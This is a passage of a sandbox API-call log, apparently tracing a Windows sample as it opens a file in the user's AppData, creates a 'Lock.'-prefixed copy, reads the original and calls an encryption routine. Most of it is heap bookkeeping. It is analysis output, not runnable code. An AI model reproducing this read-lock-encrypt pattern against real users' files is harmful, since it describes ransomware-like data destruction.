hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0243.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0243.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0243.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0243.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0243.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0243.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0243.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0243.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0243.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0243.415] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0243.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0243.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0243.415] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0243.415] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0243.416] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0243.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0243.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0243.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0243.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0243.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0243.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0243.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0243.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0243.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0243.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0243.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0243.417] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Resmon.ResmonCfg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\resmon.resmoncfg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0243.418] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.418] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0243.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0243.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0243.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0243.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0243.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0243.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0243.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0243.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0243.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0243.418] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0243.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0243.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0243.419] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0243.419] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0243.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0243.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0243.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0243.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0243.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0243.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0243.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0243.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0243.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0243.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0243.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x978528 [0243.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0243.419] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0243.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978528 | out: hHeap=0x970000) returned 1 [0243.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0243.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0243.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0243.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0243.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0243.421] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.Resmon.ResmonCfg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.resmon.resmoncfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0243.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0243.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0243.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0243.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0243.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0243.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0243.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0243.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0243.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0243.422] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0243.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0243.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0243.422] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0243.422] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0243.422] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0243.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0243.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0243.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0243.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0243.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0243.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0243.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0243.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0243.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0243.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0243.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0243.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0243.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe59020 [0243.424] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0243.424] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x1db5, lpOverlapped=0x0) returned 1 [0243.427] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0243.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0243.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0243.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0243.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0243.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1db5) returned 0x3bf0050 [0243.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe59020 | out: hHeap=0x970000) returned 1 [0243.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0243.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0243.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0243.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0243.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0243.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0243.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0243.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0243.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1db5) returned 0x3bf1e10 [0243.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0243.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.429] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0243.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0243.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0243.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0243.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0243.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1db5) returned 0x3bf0050 [0243.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0243.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0243.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0243.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0243.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0243.429] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0243.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0243.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0243.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0243.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0243.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0243.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0243.430] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0243.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0243.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0243.430] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0243.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0243.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0243.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b68 [0243.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0243.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0243.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0243.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0243.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1db5) returned 0x3bf0050 [0243.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0243.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0243.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0243.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0243.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0243.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0243.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0243.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0243.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0243.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0243.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0243.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0243.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0243.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0243.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0243.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0243.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0243.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1db5) returned 0x3bf3bd0 [0243.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0243.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0243.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0243.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0243.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0243.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0243.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0243.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0243.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0243.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0243.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0243.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0243.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0243.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0243.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0243.432] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0243.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0243.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0243.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0243.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0243.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0243.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0243.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0243.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0243.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0243.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0243.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: 